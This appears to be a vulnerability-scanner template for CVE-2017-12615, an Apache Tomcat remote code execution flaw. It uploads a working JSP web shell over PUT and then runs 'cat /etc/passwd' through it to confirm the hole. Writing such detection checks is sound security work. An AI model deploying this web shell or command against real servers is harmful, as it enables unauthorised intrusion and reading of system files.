id: CVE-2017-12615 info: name: Apache Tomcat RCE author: pikpikcu severity: high tags: cve,cve2017,apache,rce reference: https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615 description: | By design, you are not allowed to upload JSP files via the PUT method on the Apache Tomcat servers. This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. However, due to the insufficient checks, an attacker could gain remote code execution on 7.0.{0 to 79} Tomcat servers that has enabled PUT by requesting PUT method on the Tomcat server using a specially crafted HTTP request. classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.10 cve-id: CVE-2017-12615 cwe-id: CWE-434 requests: - method: PUT path: - "{{BaseURL}}/poc.jsp/" headers: Content-Type: application/x-www-form-urlencoded body: | <%@ page import="java.util.*,java.io.*"%> <% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "
"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %> - method: GET path: - "{{BaseURL}}/poc.jsp?cmd=cat+%2Fetc%2Fpasswd" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0" part: body - type: status status: - 200